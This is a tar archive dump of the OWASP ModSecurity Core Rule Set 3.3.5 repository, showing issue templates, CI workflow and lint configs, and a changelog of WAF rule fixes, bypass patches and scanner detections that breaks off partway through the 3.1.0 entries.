pax_global_header00006660000000000000000000000064144612251510014513gustar00rootroot0000000000000052 comment=c63e314e1dabcd8d5e3b364855360b2a1524f06c modsecurity-crs-3.3.5/000077500000000000000000000000001446122515100146575ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/000077500000000000000000000000001446122515100162175ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/000077500000000000000000000000001446122515100204025ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/01_false-positive.md000066400000000000000000000016451446122515100241640ustar00rootroot00000000000000--- name: 'False positive' about: Report a false positive (incorrect blocking) title: '' labels: 'False Positive' assignees: '' --- ### Description ### Audit Logs / Triggered Rule Numbers ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: ### Confirmation [ ] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted. modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/02_false-negative.md000066400000000000000000000017301446122515100241200ustar00rootroot00000000000000--- name: 'False negative' about: Report a false negative (incorrect bypass) title: '' labels: 'False Negative - Evasion' assignees: '' --- ### Description ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: ### Confirmation [ ] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted. modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/03_bug-report.md000066400000000000000000000016271446122515100233220ustar00rootroot00000000000000--- name: '🐞 Bug report' about: Create a report to help us improve title: '' labels: 'Bug' assignees: '' --- ### Describe the bug ### Steps to reproduce ### Expected behaviour ### Actual behaviour ### Additional context ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/04_feature.md000066400000000000000000000013211446122515100226570ustar00rootroot00000000000000--- name: '🚀 Feature request' about: Suggest an idea for this project title: '' labels: 'Feature Request' assignees: '' --- ### Motivation ### Proposed solution ### Alternatives ### Additional context modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/config.yml000066400000000000000000000006331446122515100223740ustar00rootroot00000000000000blank_issues_enabled: false contact_links: - name: Help and support url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. modsecurity-crs-3.3.5/.github/workflows/000077500000000000000000000000001446122515100202545ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/workflows/lint.yaml000066400000000000000000000015031446122515100221050ustar00rootroot00000000000000--- name: Lint on: [push, pull_request] jobs: check-syntax: runs-on: ubuntu-latest strategy: fail-fast: true # check why is failing and change afterwards steps: - name: Checkout repo uses: actions/checkout@v2 - name: Lint Yaml uses: ibiqlik/action-yamllint@v3 with: format: github file_or_dir: tests/regression/tests config_file: .yamllint.yml - name: Linelint uses: fernandrone/linelint@master id: linelint - name: Set up Python 3 uses: actions/setup-python@v2 with: python-version: 3.7 - name: "Check CRS syntax" run: | pip install --upgrade setuptools pip install secrules-parsing secrules-parser -c --output-type github -f rules/*.conf modsecurity-crs-3.3.5/.github/workflows/stale.yml000066400000000000000000000007161446122515100221130ustar00rootroot00000000000000name: Mark stale issues on: schedule: - cron: "0 0 * * *" jobs: stale: runs-on: ubuntu-latest steps: - uses: actions/stale@v1 with: repo-token: ${{ secrets.GITHUB_TOKEN }} stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days' stale-issue-label: 'Stale issue' days-before-stale: 120 days-before-close: 14 modsecurity-crs-3.3.5/.github/workflows/test.yml000066400000000000000000000035511446122515100217620ustar00rootroot00000000000000--- name: Regression Tests on: push: paths: - 'rules/**' - 'tests/**' - '.github/**' pull_request: paths: - 'rules/**' - 'tests/**' - '.github/**' jobs: regression: runs-on: ubuntu-latest strategy: matrix: modsec_version: [modsec2-apache] steps: - name: "Checkout repo" uses: actions/checkout@v3 - name: "Install dependencies" env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} GO_FTW_VERSION: '0.4.6' run: | gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - name: "Run tests for ${{ matrix.modsec_version }}" run: | mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2} docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml logs [ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ] ./ftw check -d tests/regression/tests ./ftw run -d tests/regression/tests --show-failures-only env: FTW_LOGFILE: './tests/logs/modsec2-apache/error.log' - name: "Change permissions if failed" if: failure() run: | # we want to get the audit log, so change permissions (file is only for root on docker) sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log - uses: actions/upload-artifact@v2 if: failure() with: name: waf-logs path: tests/logs/${{ matrix.modsec_version }} - name: Clean docker-compose run: | docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml down modsecurity-crs-3.3.5/.gitignore000066400000000000000000000005771446122515100166600ustar00rootroot00000000000000*.swp *.swo # User configuration crs-setup.conf rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf # The MaxMind GeoIP database can be downloaded or upgraded by running: # util/upgrade.py geoip util/geo-location/GeoIP.dat # Unit test caches .cache # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class .idea/ modsecurity-crs-3.3.5/.gitmodules000066400000000000000000000002361446122515100170350ustar00rootroot00000000000000[submodule "docs/OWASP-CRS-Documentation"] path = docs/OWASP-CRS-Documentation url = https://github.com/SpiderLabs/OWASP-CRS-Documentation branch = master modsecurity-crs-3.3.5/.linelint.yml000066400000000000000000000004371446122515100173020ustar00rootroot00000000000000rules: # checks if file ends in a newline character end-of-file: # set to true to enable this rule enable: true # set to true to disable autofix (if enabled globally) disable-autofix: true # will be ignored only by this rule ignore: - .pytest_cache/* modsecurity-crs-3.3.5/.travis.yml000066400000000000000000000013041446122515100167660ustar00rootroot00000000000000os: linux language: python python: - 2.7 # no more required in travis #sudo: required services: - docker jobs: include: script: - | if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test else docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test fi # safelist branches: only: - v3.1/dev - v3.2/dev - v3.3/dev - fix-travis #notifications: # irc: "chat.freenode.net#modsecurity" modsecurity-crs-3.3.5/.yamllint.yml000066400000000000000000000011251446122515100173100ustar00rootroot00000000000000extends: default rules: # Test lines can be big line-length: max: 1024 level: warning # These files below have very large lines, needed for the test. # So they will raise warnings every time. ignore: | tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml # don't bother me with this rule indentation: disable comments: require-starting-space: true # default min-spaces-from-content: 1 modsecurity-crs-3.3.5/CHANGES.md000066400000000000000000002260131446122515100162550ustar00rootroot00000000000000# OWASP ModSecurity Core Rule Set (CRS) CHANGES ## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist * or the CRS Google Group at * ## Version 3.3.5 - 2023-07-18 Important changes: * Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) Fixes: * Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) * Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) Chore: * Clean up redundant paranoia level tags (Ervin Hegedus) * Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) * Move testing framework from ftw to go-ftw (Felipe Zipitría) ## Version 3.3.4 - 2022-09-20 Fixes and improvements: * Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) ## Version 3.3.3 - 2022-09-19 Important changes: * This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. * By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. Fixes and improvements: * Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora) * Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria) * Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske) * Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini) * Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria) * Fix bypass using deflated request body (Karel Knibbe) * Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin) * Fix XML Body Parser abuse for non-XML request bodies (Jan Gora) * Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus) ## Version 3.3.2 - 2021-06-30 Fixes and improvements: * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) ## Version 3.3.0 - 2020-07-01 Important changes: * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. New functionality: * Block backup files ending with ~ in filename (Andrea Menin) * Detect ffuf vuln scanner (Will Woodson) * Detect Nuclei vuln scanner (azurit) * Detect SemrushBot crawler (Christian Folini) * Detect WFuzz vuln scanner (azurit) * New LDAP injection rule (Christian Folini) * New HTTP Splitting rule (Andrea Menin) * Add .swp to restricted extensions (Andrea Menin) * Allow CloudEvents content types (Bobby Earl) * Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini) * Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin) Removed functionality: * Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini) Improved compatibility: * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) Fixes and improvements: * WordPress: Add support for upload image/media in Gutenberg Editor (agusmu) * Prevent bypass of rule 921110 (Amit Klein, Franziska Bühler) * Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler) * fix CVE msg in rules 944120 944240 (Fernando Outeda) * Remove broken or no longer used files (Federico G. Schwindt) * Make content-type case insensitive (Franziska Bühler) * Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner) * feat(lint): split actions in linting and regression (Felipe Zipitria) * Fix FP in 921120 (Franziska Bühler) * Add missing OWASP_CRS tags (Christian Folini) * Fix GHA badges (Federico G. Schwindt) * feat(badge): add apache license badge * fix typos found by fossies codespell (Tim Herren) * Decrease processing time of rules (Ervin Hegedüs) * handle multiple directives in 920510 (Andrea Menin) * handle multiple directives in 920510 (Andrea Menin) * fix(ci): use log_contains instead (Felipe Zipitria) * Move test where it belongs (Federico G. Schwindt) * fix(ci): use docker in DetectionOnly (Felipe Zipitria) * fix(rule): remove dangling whitespace (Felipe Zipitria) * fix(ci): run actions on .github change (Felipe Zipitria) * fix(docs): update badges and links in readme (Felipe Zipitria) * README: update repo link (Walter Hop) * Update README: Copyright 2019 -> 2020 (Christian Folini) * fix(ci): run tests also on PRs (Felipe Zipitria) * fix(ci): change test name and fix default params (Felipe Zipitria) * Restore Travis Status (was in the wrong repo) (Christian Folini) * Remove outdated Travis status after migration (Christian Folini) * feat(ci): adds github actions testing (Felipe Zipitria) * fix(migration): post migration tasks (Felipe Zipitria) * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) * Added more explanations to comment of 920300 (Christian Folini) * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) * Update nextcloud excl rules and shorten var (Franziska Bühler) * Change to preferred lowercase var (Franziska Bühler) * Set var to lowercase and change comment (Franziska Bühler) * Resolve issue with allowed_request_content_types (Franziska Bühler) * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) * XenForo: update exclusions (Walter Hop) * WordPress: exclude additional URL fields in profile editor (Walter Hop) * add www to link (NullIsNot0) * Fix link for 941310 Old link does not work anymore. Change it to new one. (NullIsNot0) * Add Content-Type: multipart/related as allowed default (jeremyjpj0916) * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) * make severities and scores consistent (Walter Hop) * add QQGameHall UA (#1731) (Andrea Menin) * another test (Allan Boll) * Add word boundaries around values in SQL tautologies (942130) (Allan Boll) * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) * Fixes for 2 tests in 921200 (Christian Folini) * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) * Fix FPs for 942350 (#1706) (Franziska Bühler) * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) * Narrowing down the subpattern .*? in 941130 (Christian Folini) * Restricting a wide regex a bit (Christian Folini) * Drop escapes (Christian Folini) * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) * Remove trailing dot in several msg actions (#1678) (Tim Herren) * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin) * Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin) * Add regression tests (Franziska Bühler) * Fix FP with create with 942360 (Franziska Bühler) * Avoid embedded anchors in CRS rule 942330 (Allan Boll) * Update 942450 for less false positives, more tests (#1662) (Will Woodson) * Ensure single ranges are also checked (#1661) (Federico G. Schwindt) * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) * For bugs, also ask for the environment (#1657) (Federico G. Schwindt) * XenForo: fix incorrect escape (Walter Hop) * XenForo: additional exclusions (Walter Hop) * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) * Also ask for the paranoia level (Federico G. Schwindt) * Make it a tiny bit more colorful (Federico G. Schwindt) * Spacing (Federico G. Schwindt) * Fix emoji (Federico G. Schwindt) * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) * Fix paranoia-level log description (Andrea Menin) * change IRC to Slack (Walter Hop) * fix spacing (Walter Hop) * Moving tests and documentation folders (#1627) (Soufiane Benali) * add triggered rule (#1636) (Andrea Menin) * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) * Mark stale issues (Federico G. Schwindt) * Added support for >). Use negated classes for better performance. (Federico G. Schwindt) * Add test for issue #1580 (#1612) (Federico G. Schwindt) * removes t:lowercase (Andrea Menin) * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) * Add PL1 tag. (Anna Winkler) * Change version number for full version name (Felipe Zipitria) * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) * Ignore configuration files generated by the JetBrains editors (Anna Winkler) * Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) * Minor optimisation (Emile-Hugo SPIR) * Also fix the `as herefrom` pattern (Emile-Hugo SPIR) * More conservative fix (Emile-Hugo SPIR) * Update the source file (Emile-Hugo SPIR) * Fix a FP (`, aside from`) (Emile-Hugo SPIR) * regression fix for #1581 (emphazer) * Change order to check ip first in both rules (Felipe Zipitria) * Change chain order (Felipe Zipitria) * Fix spacing in text (Felipe Zipitria) * Add link to mailing list archives (Felipe Zipitria) * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) * Update mailing list links to google group (Felipe Zipitria) * Fix typo and add 2 new entries to 941160 (Franziska Bühler) * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) * fix rule regex due to remove t:removeComments (Andrea Menin) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) ## Version 3.2.0 - 2019-09-24 New functionality: * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) * Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler) * Add extended access.log format to Docker (Franziska Bühler) * Add libinjection check on last path segment (Max Leske, Christian Folini) * Add PUBLIC identifier for XML entities (#1490) (Rufus125) * Add .rdb to default restricted_extensions (Walter Hop) * Add .swp to default restricted_extensions (Andrea Menin) * Add rule 933200 PHP Wrappers (Andrea Menin) * Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan) * Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders) * Add unix-shell commands (Christoph Hansen, Chaim Sanders) * Also inspect the path for the script tag (Federico G. Schwindt) * Detect 80legs, sysscan, Gobuster scanners (Brent Clark) * Detect CGI source code leakages (Christoph Hansen, Walter Hop) * Detect 'crawler' user-agent (Federico G. Schwindt) * Detect Jorgee, Zgrab scanners (Walter Hop) * Detect MySQL in-line comments (Franziska Bühler) * Detect Wappalyzer scanner (Christian Folini, Chaim Sanders) * Java RCE: Add struts namespaces (Walter Hop) * Java RCE: Detect more java classes (Manuel Leos) * Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin) * Make CRS variables configurable in Docker image (Franziska Bühler) * New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini) * Node.js unserialization + javascript RCE snippets (Walter Hop) * Request smuggling: Also cover pre http/1.0 requests (Federico G. Schwindt) * Restricted files: Added many dotfiles (Dan Ehrlich) * SQLi bypass detection: ticks and backticks (Franziska Bühler) * XenForo rule exclusion profile (Walter Hop) Removed functionality: * Remove unused protected_uploads setting from setup (Walter Hop) * Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt) * Remove deprecated upgrade script (Walter Hop) Improved compatibility: * Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus) * Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt) * RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll) * Hyperscan compatibility and simplification for 942450 (Allan Boll) Fixes and improvements: * 932140: fix ReDoS in FOR expression (Walter Hop) * 933200: Simplify pattern (Federico G. Schwindt, Andrea Menin) * 941380: fix anomaly score variable (Franziska Bühler) * 942510, 942511: fix anomaly score variable (Walter Hop) * Add content-type application/csp-report (Andrea Menin) * Add content-type application/xss-auditor-report (Andrea Menin) * Add CRS 3.2 Badge build support. (Chaim Sanders) * Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler) * Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler) * Add CVE-2018-2380 to comments of rules (Franziska Bühler) * Add default env vars for anomaly scores in Docker (Franziska Bühler) * Add missing OWASP_CRS tags to 921xxx rules (Walter Hop) * Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler) * Add spaces in front of closing square brackets (Franziska Bühler) * Add travis changes (#1316) (Chaim Sanders) * Allow dot characters in Content-Type multipart boundary (Walter Hop) * Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. (Federico G. Schwindt) * As per the ref manual, it is compressWhitespace (Federico G. Schwindt) * Avoid php leak false positive with WOFF files (Manuel Spartan) * Bring back CRS 2.x renumbering utility (Walter Hop) * Clean up travis and reorg (Federico G. Schwindt) * Code cosmetics: reorder the actions of rules (Ervin Hegedus) * Content-Type is case insensitive (Federico G. Schwindt) * Disassembled 941160 (Franziska Bühler) * Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt) * Drop t:lowercase from 941350 (Federico G. Schwindt) * Drop unneeded capture groups and tidy up (Federico G. Schwindt) * Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt) * Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. Schwindt) * Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin) * Fix 920460 test (Federico G. Schwindt) * Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini) * Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi) * Fix commit default for non 2.9 branch (Chaim Sanders) * Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders) * Fix date (Chaim Sanders) * Fix Docker image SSL support (Franziska Bühler) * Fix duplicate .env (jschleus, Chaim Sanders) * Fix executing paranoia level counters (Christian Folini) * Fix indentation and python version in crs2-renumbering script (Chaim Sanders) * Fix input / headers misordering (Christian Folini) * Fix path traversal attack pattern at id:930110 (Ervin Hegedus) * Fix regexp in Docker image (Franziska Bühler) * Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen) * Fix request header Sec-Fetch-User false positive (na1ex) * Fix runaway regexp in 942260. Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt) * Fix small typo in variable (Felipe Zipitria) * Fix spelling error in variable name (supplient) * Fix transform name pointed out by secrules_parsing (Federico G. Schwindt) * Fix Travis Merge not being able to find HEAD (Chaim Sanders) * Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen) * Fix wrong regex, assembly result, in 942370 (Franziska Bühler) * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) * Mark patterns not supported by re2 (Federico G. Schwindt) * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) * Move PROXYLOCATION var (Franziska Bühler) * PHP: move get_defined_functions() and friends into PL1 (Walter Hop) * Pin the ftw version to 1.1.7 for now (Federico G. Schwindt) * Prevent bypass 933180 PHP Variable Function (Andrea Menin) * Reduce comments, introduction of triggered exploits (Franziska Bühler) * Remove all trailing spaces from ftw yaml test files (Ervin Hegedus) * Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt) * Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin) * Remove old and unwanted setvar constructs (Federico G. Schwindt) * Remove superfluous comments (Walter Hop) * Remove superfluous pmf (Federico G. Schwindt) * Remove t:lowercase from 920490 (Christian Folini) * Remove WARNING from php-errors.data (Andrea Menin) * Reorder actions (Federico G. Schwindt) * Replacing all @pmf with @pmFromFile (Christian Treutler) * Restricted-files.data: add AWS config (Walter Hop) * SQLI: removed unnecessary + (Christoph Hansen) * Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt) * unix-shell.data: fix typo in 'more' (Walter Hop) * Update .travis.yml Update to support v3.1 (Chaim Sanders) * Update dockerfile to always use 3.2/dev (Federico G. Schwindt) * Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders) * Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen) * Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen) * Wordpress: add support for Gutenberg editor (siric_, Walter Hop) * Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop) * WordPress: exclude Gutenberg via rest_route (Walter Hop) * WordPress: exclude some more profile.php fields from RFI rule (Walter Hop) * WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop) * XML Soap Encoding fix 920240 (Christoph Hansen) Unit tests: * 932140: add regression tests (Walter Hop) * 933180: fix tests which were doing nothing (Walter Hop) * 941370: add some more tests, fix whitespace (Walter Hop) * Add more tests for 941130 (Christian Folini) * Add regression test for 941101 (Avery Wong) * Add regression tests for 942150, 942100, 942260 (Christian Folini) * Add regression tests to 941160 (Franziska Bühler) * Add some regression tests (Ervin Hegedus) * Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders) * Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini) * Add tests for rule 921110 (Yu Yagihashi) * Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen) * Drop tests for removed rules (Federico G. Schwindt) * Fix failing regression tests (Ervin Hegedus) * Fix failing tests (Manuel Spartan, Chaim Sanders) * Fix readme typos in example rule (Walter Hop) * Fix test 941110-2 (Federico G. Schwindt) * Fix YAML 1.2 compliance with "true" (Federico G. Schwindt) * RCE: Add tests for the for command (Federico G. Schwindt) * Update regression tests for rules 931110, 931120, 931130 (Simon Studer) Documentation: * Add details to README for Dockerhub (Franziska Bühler) * Add intro/comment to CVE comments (Franziska Bühler) * CONTRIBUTING: add note about separate PRs (Walter Hop) * Erased gitter chat. Added CII badge (Felipe Zipitria) * Replaced descriptions (Christian Folini) * Summarized authors on single line in tests for 941160 (Christian Folini) * Update broken link in regexp-assemble blog URLs (Walter Hop) * Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría) * Update CONTRIBUTORS order (Andrea Menin) * Update README.md (Rufus125) * Updating crs site location (Chaim Sanders) ## Version 3.1.1 - 2019-06-26 * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) * Allow % encoding in 920240 (Christoph Hansen) * Fix bug in 920440 (Andrea Menin) * Fix bug in 920470 (Walter Hop) * Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) * Fix bug in 943120 (XeroChen) ## Version 3.1.0 - 2018-08-07 * Add Detectify scanner (Andrea Menin) * Renaming matched_var/s (Victor Hora) * Remove lines with bare '#' comment char (Walter Hop) * Drop the XML variable from rule 932190 (Federico G. Schwindt) * Update outdated URLs (Walter Hop) * remove unused rule 901180 (Walter Hop) * Drop exit from unix and windows RCE (Federico G. Schwindt) * Fix anomaly_score counters (Federico G. Schwindt) * Remove mostly redundant 944220 in favor of 944240 (Christian Folini) * Add self[ and document[ to rule 941180 (Andrea Menin) * Provide proxy support within CRS docker image (Scott O'Neil) * Prevent bypass in rule 930120 PL3 (Andrea Menin) * Fix small typo in variable (Felipe Zipitría) * Fix bug #1166 in Docker image (Franziska Bühler) * Remove revision status from rules (Federico G. Schwindt) * Add template for issues (Federico G. Schwindt) * Correct failing travis tests in merge situations (Federico G. Schwindt) * Remove unused global variable in IIS rules (Chaim Sanders) * Refactor to use phase number instead of name (Federico G. Schwindt) * Add uploaded file name check; refresh LFI / filename checks (Walter Hop) * Introduce critical sibling of 920340 in PL2 (Walter Hop) * Fix bypass caused by multiple spaces in RCE rules (Walter Hop) * Remove unneeded regex capture groups (Federico G. Schwindt) * Add built-in exceptions for CPanel (Christoph Hansen) * Add additional file restrictios for ws_ftp, 